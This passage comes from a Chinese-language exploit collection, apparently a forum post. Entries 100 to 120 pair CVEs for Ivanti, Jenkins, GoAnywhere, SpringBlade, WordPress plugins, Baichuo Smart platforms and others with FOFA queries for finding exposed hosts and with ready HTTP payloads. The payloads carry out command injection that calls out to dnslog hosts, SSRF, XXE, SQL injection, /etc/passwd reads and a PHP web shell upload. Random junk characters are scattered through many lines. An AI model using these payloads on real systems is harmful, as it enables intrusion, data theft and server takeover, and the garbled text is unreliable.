Connection: close1 |6 j! c- C- d
Content-Length: 154; p+ I* h7 b& [- X0 k* H; u. S8 s7 ?
Accept: */*
8 H" m" @5 s* [3 [ @2 q) kAccept-Encoding: gzip, deflate
# f+ V3 k1 V2 V3 c* n( r1 ^' N! hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( H$ d/ c) @2 y. l7 g7 a4 K/ @& r& }
Content-Type: application/x-www-form-urlencoded; charset=UTF-8( p g2 L: s3 j* I, t2 D
X-Requested-With: XMLHttpRequest5 s+ r: _' i/ A7 A: q
3 a% l+ r3 T( ]- M( ~%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
5 ]/ { a* G; I
- n" b L7 z: T$ r" U. J% O% q- _1 U. Q' ]! W5 E" u
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
- J) z, L5 [4 T0 h1 q0 jCVE-2024-0352
6 e* ?; \* L9 m" p) F+ Z# {; UFOFA:icon_hash="874152924"9 [ V2 w3 y2 g1 a# o
POST /api/file/formimage HTTP/1.15 X" N* p0 T7 ?/ L
Host: 192.168.40.130, y3 t2 V8 C, n1 {1 {& Y! Y/ J0 Q) ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
1 z E; N* l# H0 k6 a7 ]1 gConnection: close' R) d+ m9 L6 g9 X: f
Content-Length: 201. F0 r% F6 {! u/ `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
; I3 z6 o1 S% F: v3 ]( q6 wAccept-Encoding: gzip
$ A" C7 y0 c( g/ l! B- _7 |. G, _: f' A
------WebKitFormBoundarygcflwtei
$ _, S: S K9 j- s9 DContent-Disposition: form-data; name="file";filename="IE4MGP.php"
9 ]4 z/ |. b# o8 FContent-Type: application/x-php
3 v; e7 H- F/ n9 k) o1 N$ Q8 |) U& K0 m% X3 ~$ \# R$ Y: z K4 v
2ayyhRXiAsKXL8olvF5s4qqyI2O
6 x6 p' ^8 X9 t1 M1 b5 }7 j3 c------WebKitFormBoundarygcflwtei--
+ P, p4 K1 e( H5 m$ X
, J3 U' U+ Y4 Y) j6 Q9 H6 c6 W9 L7 `: M
101. ivanti policy secure-22.6命令注入
6 Y2 _( b7 j, k$ UCVE-2024-21887# q W# V5 j" c' \( _( k
FOFA:body="welcome.cgi?p=logo"
3 ~4 [2 B2 t4 r0 Y8 ?GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.16 C5 h( t; M% K4 I4 R) g
Host: x.x.x.xx.x.x.x( H6 X) v' H, R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- N' H5 D, q. V$ @' c
Connection: close* j8 H( h D5 ?6 |& o
Accept-Encoding: gzip
5 F5 V, B$ T& @6 B1 M) D! D/ J
( A7 W8 {2 ?% K& Z6 ] G! v+ Y8 l$ n8 v, b
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行0 s8 a8 Z8 {' R- h; L% [
CVE-2024-21893
7 }, G6 k; h: w$ _; f. {FOFA:body="welcome.cgi?p=logo"
) z) J: @7 x2 E, ZPOST /dana-ws/saml20.ws HTTP/1.1
8 l" g( V' O( T* ~+ hHost: x.x.x.x, Q8 s& u- m% ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 |8 c4 K3 E* _5 qConnection: close
- [% O* I+ y5 s' z( T2 w1 t3 TContent-Length: 792
" s) }2 P$ V% _& n" zAccept-Encoding: gzip5 x* v0 g. Z3 o7 r
# m# t) D& D9 P; f5 X+ p4 |" F
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>+ |! {8 n" i# B" i; @ c8 x
; ] X+ Z5 w) {0 o7 I, e
103. Ivanti Pulse Connect Secure VPN XXE
4 B4 O! B3 ~; O3 B0 `" E: jCVE-2024-22024
! m) m- o2 B$ T' h) v; q3 u2 xFOFA:body="welcome.cgi?p=logo"
& S6 ?/ z" v. b! zPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
# T5 o! ]4 b1 \8 t a/ e: THost: 192.168.40.130:111
% Q' h4 S# b6 J. B8 LUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ [+ x9 o- P2 @2 E1 G9 h7 i
Connection: close
8 R5 g4 N: z6 t3 HContent-Length: 204; ?) b9 ?& M) @$ M, C9 x' P& Q6 \
Content-Type: application/x-www-form-urlencoded
6 P4 p! ?; }, [: v9 V/ x, Y1 d/ QAccept-Encoding: gzip' _3 H- X0 U9 ?& v
8 \* t1 k' a* j
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
( _ w- {6 y, G+ @) A# y: i( n( h# i5 ^/ v/ W: Q# n
" k! E' D! L3 q' }
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下7 x: L3 Q$ X% L6 d
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>$ t' u- C5 e) y! A' o
. j- d# c* ^- o8 W/ y7 J% k
5 `- g+ h6 v9 P1 q, {104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露7 k. j! K0 q9 g- s: J0 ~# P
CVE-2024-0569
7 c% C( q- f! S% O& K4 S* VFOFA:title="TOTOLINK"
X3 }1 Y; y) | x! ?3 IPOST /cgi-bin/cstecgi.cgi HTTP/1.1& ]; i! }" e3 o0 K8 A
Host:192.168.0.1
# l/ a" ~6 w+ w/ P3 X) ]; @Content-Length:413 w0 k' l3 c2 e" b+ y" I
Accept:application/json,text/javascript,*/*;q=0.01# g3 T# x, x* z: q P% O) l" M- f
X-Requested-with: XMLHttpRequest" Y. Z& |/ u0 Z* v, b4 f9 }
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36* N( o! x0 M% p- X; u
Content-Type: application/x-www-form-urlencoded:charset=UTF-8, f7 x9 p) K; A8 u9 w) E; U
Origin: http://192.168.0.16 r% H: f& o' M: U* A" d" l5 B- K
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
* X# L. C( z5 z. ?, WAccept-Encoding:gzip,deflate, M3 K& r l; @2 m4 i4 l, p5 ]
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
4 u" L% n8 y: M& i U3 X, o0 |Connection:close* v |: Q+ w+ ?' y. e
" N' F0 y" b3 ]. Y+ W/ W% L
{) g4 [& g- Y4 V& j9 N7 ~/ V
"topicurl":"getSysStatusCfg",% T% ?- x1 M. P
"token":""$ n$ u+ r' \8 h: k5 x
}
( I+ t" K: K' A* b5 S0 K
3 ?; J% i6 b( Y, ~3 w) X105. SpringBlade v3.2.0 export-user SQL 注入) d8 x. q! |$ r0 s
FOFA:body="https://bladex.vip"1 O$ u8 ~. k: {- p
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
" C( O6 H3 Y$ w7 ^, T: e
' K* Z0 i i- s- }) ]106. SpringBlade dict-biz/list SQL 注入 d9 t) o, w* W v2 v& _
FOFA:body="Saber 将不能正常工作"0 m/ C! [2 l. r
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
( g2 b2 b; w. B+ _7 Q0 N8 ^/ }Host: your-ip
, V; T, I9 `" B A$ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; A6 N& a0 G& s8 {5 P2 b4 h+ d( ^
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A g! z9 e9 ~' U! v4 f/ p+ A
Accept-Encoding: gzip, deflate
, L1 `) Z! n d4 {; ZAccept-Language: zh-CN,zh;q=0.9
1 x) K7 |4 m. n2 @( P/ QConnection: close
( i$ u8 A/ N; R F! o% _" n6 V! {+ O
$ I" I( ^9 `3 n4 K
107. SpringBlade tenant/list SQL 注入
, A+ I# v: ` V6 EFOFA:body="https://bladex.vip"
- C& f- j( w! @ |9 rGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ a4 F8 g( q3 `5 ~4 EHost: your-ip
' ~1 R4 E& `. g& g3 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* |# r* t, p6 P/ a) Z" `. `4 D# |Blade-Auth:替换为自己的
. y* R! i$ |) JConnection: close
* O, A q/ @/ |. g% B% x5 k: @: r( f o2 ^ `
; x3 _0 k9 f1 U! T5 F
108. D-Tale 3.9.0 SSRF
( q& R( {" U3 }7 h' yCVE-2024-21642
& I% t8 Q0 z6 h5 y3 f1 p% B2 pFOFA:"dtale/static/images/favicon.png"$ W0 T' `5 k9 @' R
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
0 O0 C' z1 T7 ]! K7 T! H$ L( @Host: your-ip
" v* Z' o+ I& k1 J$ ~Accept: application/json, text/plain, */*, O* D- O9 Y% @# D1 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 L5 ^, v. H! ^5 P1 mAccept-Encoding: gzip, deflate' K1 z! R% A( j9 E
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# X% }6 s- _ G; N$ l9 W* T+ B
Connection: close& J2 C/ t5 q' J, [8 Y1 P
; C9 \4 [0 G F1 a: D$ c
/ H( W0 x* \3 r" V( z5 Y: b109. Jenkins CLI 任意文件读取
: U0 b+ z [" T* M3 z3 q$ m. ~% QCVE-2024-23897
0 I! B! j( Y: X0 j( sFOFA:header="X-Jenkins"
: Q4 P) p5 O7 W4 m) `POST /cli?remoting=false HTTP/1.1) X# T; {1 P0 {1 } i& e y
Host:
# w( b" Q. |& C, V6 hContent-type: application/octet-stream
`( L' z+ O" m7 }6 g/ `- lSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 @5 q2 }% h; J Q
Side: upload
, c( U" [; B% M {Connection: keep-alive
2 P& r" F, S% ]7 \$ l5 L0 B, _) ~Content-Length: 163# _4 l6 D+ o0 h9 i f
- J8 y$ s0 }+ x6 o& Y% P; cb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'$ n9 z* E* [3 T* Y
7 u u* p! I, ^2 d: @" Z8 ^: r
4 f9 o. A" {) ]5 o6 v5 RPOST /cli?remoting=false HTTP/1.1
5 Q! M, E& e6 @. j2 OHost:
4 M/ P# f& [: m; O4 t+ FSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
/ j0 v& f: K9 ?3 Udownload4 O8 p- l5 j. m! V5 Z. H
Content-Type: application/x-www-form-urlencoded
2 P" o3 V/ O3 t GContent-Length: 0
3 ^2 L- |' A% X4 [) V6 F/ ~1 a* N& f" V3 S" `4 R. m9 _
; V3 h4 H+ o0 C4 N( a0 U
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin5 a% p3 d4 d. T7 N0 P2 [: {
java -jar jenkins-cli.jar help$ }/ l6 G" |4 i7 l
[COMMAND]+ Y! B- K4 `/ S
Lists all the available commands or a detailed description of single command.8 m3 J( d0 J" }; ~ b
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)* i. [0 x5 H$ I
7 P9 P/ [, E" X8 s
7 P) F# y3 I: ]' c
110. Goanywhere MFT 未授权创建管理员
+ }7 U$ Y1 r8 o$ Z# QCVE-2024-0204% H+ N* w; D$ B7 z) C, U3 c
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
# g D* M8 M% D0 ^0 x0 IGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
\. l: f* K+ s: PHost: 192.168.40.130:80006 N9 o( q9 ]1 d1 [
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.360 {0 q2 O' E+ ?' @# r' B1 N( j
Connection: close- @8 ~) t- E/ {7 q
Accept: */*& W" U3 w1 Z8 }# j+ ~
Accept-Language: en e2 ^# T+ a) p y' D, ?2 E
Accept-Encoding: gzip
3 X, g0 y! h3 i/ o0 R% M, d9 X" J; r1 V
) C [( J7 b: U6 o* P$ r7 n111. WordPress Plugin HTML5 Video Player SQL注入
1 L6 ^# B& P, B) P: `CVE-2024-1061' O% M8 ^+ l2 _% C
FOFA:"wordpress" && body="html5-video-player"; `( J! n# Z! A; V
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
# o: z$ N6 ^$ uHost: 192.168.40.130:112) K$ G8 ^+ S' B: C' n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' k, P( X: M( }0 k& |
Connection: close
' y( L1 V( n1 q2 f; f0 RAccept: */*. o' J4 n) w6 {( |+ o* ~
Accept-Language: en- G$ m2 v& s' x" i( `+ K
Accept-Encoding: gzip
2 |0 [1 ?8 ?1 }+ r; u3 ]
: p7 T h. P+ }$ l* R
! h. {# I% s! D5 U! K112. WordPress Plugin NotificationX SQL 注入. e1 Q1 ]7 b0 G$ A0 [
CVE-2024-1698" U7 \7 j) l; G1 I7 m1 d& ~
FOFA:body="/wp-content/plugins/notificationx"
; z0 G1 x8 L; a6 S' |" {6 wPOST /wp-json/notificationx/v1/analytics HTTP/1.1
: n; b: m6 w; P3 KHost: {{Hostname}}' h( f; u- t: g7 ]5 E
Content-Type: application/json, l! L- g# ^! {
* @6 `3 ~+ V' U" j{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
' t. H+ _# h* V+ S! Z) X# B ^5 x3 G& w4 r
+ _! k# `: h, b3 N) F9 ^& d" W113. WordPress Automatic 插件任意文件下载和SSRF
9 z# ~2 j3 o+ Y: G7 z+ fCVE-2024-279540 @+ Z8 g7 t* R! Y& f$ ~1 k6 X
FOFA:"/wp-content/plugins/wp-automatic"
9 T$ j+ h0 u& Z/ \GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
: c! \# \; v6 \9 H: NHost: x.x.x.x9 f4 i8 P% c Y/ U! m5 c6 m0 {
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
3 N/ L5 d( y2 u9 i p' yConnection: close, C2 b/ h! E$ B' L/ U
Accept: */*0 a/ }4 h* P3 K2 p0 \9 e# e: \
Accept-Language: en) f) c: E) ^3 H: d* _
Accept-Encoding: gzip0 `$ J3 X: x# U# w% t
! {0 v w; P- r6 x3 ]: {1 [9 p" Q h/ P. Z1 Y P4 f
114. WordPress MasterStudy LMS插件 SQL注入& a9 R( C, K' |! x" B% h) e
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"; B! q d9 h; P$ g$ o* `+ j
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1. [& C4 V |8 L; V6 I7 p, y- \3 g
Host: your-ip$ b& ? C0 e0 G5 g6 d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 I& a; _0 x. L& `" G; ^7 ?& q
Accept-Charset: utf-82 D! Y% o! J; |: O
Accept-Encoding: gzip, deflate5 ~) @6 u+ C# C Q# A/ j1 M" h! W$ B
Connection: close2 b5 o: p6 P& F6 u% w( k2 f" K: `4 D
6 Q% u- I& u2 ?* X% }2 f, k, P+ R
3 [ H7 a2 `5 s- Z. d115. WordPress Bricks Builder <= 1.9.6 RCE
4 c; R- l7 m, F, ]CVE-2024-25600
% V8 _( }! e$ R1 K8 t8 i$ ?FOFA: body="/wp-content/themes/bricks/"
0 f0 Y3 a" K1 g. H第一步,获取网站的nonce值
$ W `& n2 B; J) |: X6 I: ZGET / HTTP/1.1- B9 P0 R; _# W( r$ q6 m( F: L
Host: x.x.x.x
8 F# J( J$ Z1 O C% gUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36* i5 e' q& e3 e+ w" j# I/ T' p
Connection: close
: R! L7 K0 F9 H" E! D5 xAccept-Encoding: gzip
; ]( @7 U4 t7 H, ~' s! H9 P& t8 R* \+ o. l- A ]! T
q8 W( W! y8 q; r. P) {第二步替换nonce值,执行命令) V7 z& g: g m- b/ D; `( {
POST /wp-json/bricks/v1/render_element HTTP/1.1
, n5 m: j' F' Y7 h. dHost: x.x.x.x
& u: ^' ^- \( xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% v! b+ ^- }5 c3 w0 \/ LConnection: close
1 B* [$ e' \& T" E; s8 d* qContent-Length: 356( P" ~; Q6 t4 n8 |' R
Content-Type: application/json2 V" Q1 w1 j e1 r3 J% r# |7 ]$ U
Accept-Encoding: gzip
7 q: ?" Y# c0 Q+ K
2 y3 F* a) K; _: C C{
9 u% N, }' C; r/ S) u8 o"postId": "1",
& k1 ^9 Q1 T. W "nonce": "第一步获得的值",
5 I7 r/ M- D" H% C/ p "element": {
! P# i& D5 N' P0 H" q; i }9 \8 p "name": "container",
4 a* N# ?+ N/ E "settings": {
6 v: p' v" Y1 |# K. S2 w5 N "hasLoop": "true",
3 F6 |! _6 y( G: E "query": {9 `+ a6 X3 J5 A0 H# M2 j. O
"useQueryEditor": true,
! n1 E4 F3 p/ B, v& D7 \. N "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
4 ], y& y# s* V+ z# v8 I "objectType": "post"
7 ?7 ~+ }2 W6 K% C: P! R }9 n, K" `; n+ e; z
}$ F% h6 {) I1 c; ^; S
}
3 r/ P$ O( L7 z- m0 n& K+ q3 F2 n, g}
! @, O& p: Q" k/ _# R
( x9 k) G8 M% E) S8 L' Z5 ~% n% z5 b" g
116. wordpress js-support-ticket文件上传" B. o% h- f9 e( M3 m
FOFA:body="wp-content/plugins/js-support-ticket"; ]% C" w' O1 K: w. J* U
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
: ~4 X( A: `, {+ }0 pHost:' O) A9 C3 w- n2 x) f) M8 ?( G
Content-Type: multipart/form-data; boundary=--------767099171
# T3 W: ^+ F* H. lUser-Agent: Mozilla/5.01 c. `4 I8 Z i; _% _+ f, U Q. k
" `- Y9 s; w' \
----------767099171
; j( n4 ~8 c/ EContent-Disposition: form-data; name="action"
, V0 F' P+ u% n$ V V8 a) Wconfiguration_saveconfiguration
0 p# l# ~, m# @, `6 _----------7670991710 P* R1 p; @1 U) L7 o
Content-Disposition: form-data; name="form_request"
$ v. {. W# y3 n! C- _3 Kjssupportticket/ M, g4 \+ k5 p# N9 ^7 E, U/ [
----------767099171# {7 f2 i0 E' c# d1 n: c8 o
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"& `. G- W* u5 F) A: @
Content-Type: image/png. T8 y$ u1 J# _. `
----------767099171--
0 c: v$ L* e- a+ C2 G
6 P4 }' ^+ p7 { b- a( V! J# R" J4 n# c* F( q. O2 k! s
117. WordPress LayerSlider插件SQL注入. s% r' Y8 P9 ?$ r, C) O. s
version:7.9.11 – 7.10.0
* @1 A* w; i4 j! v$ AFOFA:body="/wp-content/plugins/LayerSlider/"' M3 `% a2 r% K5 Z1 f
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
* c* v5 `4 U. z dHost: your-ip% t$ l& x Q2 ?; d5 Y" p" C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* K% ?/ C+ J# N, wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 a3 C. L* B `0 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# e- M* d! w) d! R
Accept-Encoding: gzip, deflate, br
# o. s9 f) W# }; d/ P; DConnection: close: V- x" [, r; Z& Z# ^7 ^- z
Upgrade-Insecure-Requests: 10 A/ s+ `$ g" M% L$ w
z/ L' W- b, U5 u' E/ q: k* Z
1 g5 A; s, k0 i$ ]- y4 r' ^$ @118. 北京百绰智能S210管理平台uploadfile.php任意文件上传8 o$ f+ L6 Z# B# I# _
CVE-2024-0939
& r5 F2 Q8 U' O0 u2 pFOFA:title="Smart管理平台"# B9 f0 y5 `, L, _( \$ n' `
POST /Tool/uploadfile.php? HTTP/1.1
! s: n1 `9 @$ T g& i% \# tHost: 192.168.40.130:8443% L/ o) v. m7 w4 @
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
( S5 R( ?, c: y1 k B; k; v) |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.08 Z) ~5 z; ]0 o$ Q. s2 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* b$ _3 `0 s: ~7 {' bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 Z; B6 y0 ?" c7 @Accept-Encoding: gzip, deflate
6 [$ A6 s/ ]" t, P8 iContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
" ]2 L0 V0 m+ \$ m+ DContent-Length: 405
+ W9 }, X5 o% f. _& LOrigin: https://192.168.40.130:8443
* _ L! ~9 M [Referer: https://192.168.40.130:8443/Tool/uploadfile.php
" b$ `6 ?5 ^1 ^9 VUpgrade-Insecure-Requests: 10 U6 I% _) t& @- O+ q$ I. e
Sec-Fetch-Dest: document
: c" R' m/ d3 M) p2 b' n) lSec-Fetch-Mode: navigate& T2 a8 l/ G* b+ O' Q
Sec-Fetch-Site: same-origin4 e& P$ k/ T5 I; @
Sec-Fetch-User: ?1
* ~* U8 j7 h1 X7 R6 [, X. u% U) {Te: trailers
3 P6 P1 \( Q: J j/ e; k# ]Connection: close
$ Y9 E* w }& [; n% j$ C9 P3 t' K( q! O% w! e
-----------------------------139797012227476466340371828877 Z+ ]* ^. K0 W: ?8 ?/ t- N
Content-Disposition: form-data; name="file_upload"; filename="contents.php"7 d3 |; H( j% [9 V1 y
Content-Type: application/octet-stream
& j7 u" w- a+ \3 S% c+ \& `
! O$ Y6 i- n4 h, { c6 x4 T<?php
& {% [2 v( G, E; x/ _system($_POST["passwd"]);. D. x. V! z" m
?>% I* l' N# L+ S$ F; S# g1 T
-----------------------------139797012227476466340371828877 R# H, v+ V- ^0 }( C
Content-Disposition: form-data; name="txt_path"; v) q5 \1 [/ l, k
8 G5 i+ r+ p/ i0 J: o, ?* T2 ]$ i/home/src.php
( p6 H. p D+ d& _! j-----------------------------13979701222747646634037182887--
8 C$ z E# M; H2 k: _/ C
2 v. G3 U/ g# B( j
4 k4 O5 ^) z7 n$ g) N) \访问/home/src.php
2 n7 F9 \9 A, p% f* q+ \. ~( P8 ~
( l/ B! }2 \7 G9 R& [1 T% K5 o: D119. 北京百绰智能S20后台sysmanageajax.php sql注入- O7 ~' B' Q) D8 S+ z' R
CVE-2024-1254
, D$ V4 J) Z$ X. \, F. }9 u" nFOFA:title="Smart管理平台"/ Z7 R% H8 Q9 [+ K8 \6 E
先登录进入系统,默认账号密码为admin/admin! ~) B, T! Z7 a& J3 W! g
POST /sysmanage/sysmanageajax.php HTTP/1.11
% [& [4 M; H9 B* t* c2 fHost: x.x.x.x
/ U! n( s! Y( A6 u, eCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
' E! y/ V' A, n5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
$ y' F1 V& N) ~9 nAccept: */*
7 V9 `+ w4 w g% y7 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 A2 Y) l8 X- z$ M0 ^Accept-Encoding: gzip, deflate
( a+ X5 A2 k5 W: K3 H6 wContent-Type: application/x-www-form-urlencoded;) p9 a8 O8 F$ |9 A9 k
Content-Length: 109- ^ i2 W4 C, `3 x f9 B; x
Origin: https://58.18.133.60:8443* r' p! [& n$ \2 M m
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
0 W; n2 s2 W/ t6 fSec-Fetch-Dest: empty/ ~7 X( u( x/ f6 Q* E Q* O; b/ {) ~3 J
Sec-Fetch-Mode: cors
6 S G2 W. x/ M5 l n! MSec-Fetch-Site: same-origin
; r7 P7 w7 J. O/ Z6 tX-Forwarded-For: 1.1.1.12 t) f0 y! H- d& @9 h3 G4 A
X-Originating-Ip: 1.1.1.1
7 r9 Z% D1 t/ O& Z _X-Remote-Ip: 1.1.1.1
, z( r; U& v* p5 g9 x; lX-Remote-Addr: 1.1.1.1# J/ a |+ f, k ~4 ?1 o! A: J
Te: trailers
a! t; \4 p! `3 ~ q9 n! w& LConnection: close3 `6 A/ w% Z. R" e
2 F& b; t! r) C0 Q8 Q/ L
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
6 w1 e& }1 @ w+ V' f. x/ c
7 F* u$ V5 q) ^# P; g3 T- _, H C' c
120. 北京百绰智能S40管理平台导入web.php任意文件上传
3 ?* z# E* M' ]! K- } |$ X1 @CVE-2024-12531 F! f4 V b- n, I( s! |
FOFA:title="Smart管理平台") m8 N) k# z' W; ]2 |
POST /useratte/web.php? HTTP/1.13 M+ @2 z1 t7 R+ Q# R: A U" x% \
Host: ip:port
; K) J4 K. J6 ~8 `Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
5 S# Z' j3 J% V) [: E' k' {: rUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
1 D# p9 ~, w2 j) I8 q% }0 a* VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
